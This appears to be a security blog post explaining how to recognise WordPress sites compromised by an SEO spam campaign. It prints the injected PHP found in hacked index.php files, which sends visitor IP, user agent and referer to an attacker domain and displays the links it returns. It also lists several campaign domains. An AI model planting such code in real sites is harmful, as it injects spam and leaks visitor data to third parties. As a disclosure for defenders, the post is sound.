The Latest in IT Security

If you run a WordPress site and you are seeing the following error at the top of your pages:

sh: /usr/local/bin/python: No such file or directory

It means that it is likely compromised. How do we know that? We were tracking a large blackhat SEO spam campaign (targeting WordPress sites) and we noticed that for the last few days one of their link distrubution domains were broken and generating an error. So any hacked site would display that error instead of showing the spammy links.

This is the code that caused it (added to the index.php of the hacked sites):

<?php
        $url = "http://apollos&#46com&#46tw/LHRS/12/request&#46php?ip="&#46$_SERVER[‘REMOTE_ADDR’]&#46"&useragent="&#46urlencode($_SERVER[‘HTTP_USER_AGENT’])&#46"&referer="&#46urlencode($_SERVER["HTTP_REFERER"]);
        $answer = file_get_contents($url);
        if (strpos($answer,"noredirect") === false) {
                echo $answer;
        }
?>

As you can see, it attempts to connect to apollos.com.tw to get the list of links to display. However, if you access this domain now you will get a python error instead…

Those are some other domains being used in this spam campaign:

apollos.com.tw
coolbloglinks.com
iqitiq.com
readerspot.com
tsarstvonebesnoe.ru
wat.az

If you are unsure if your site is compromised, try doing a quick scan here: http://sitecheck.sucuri.net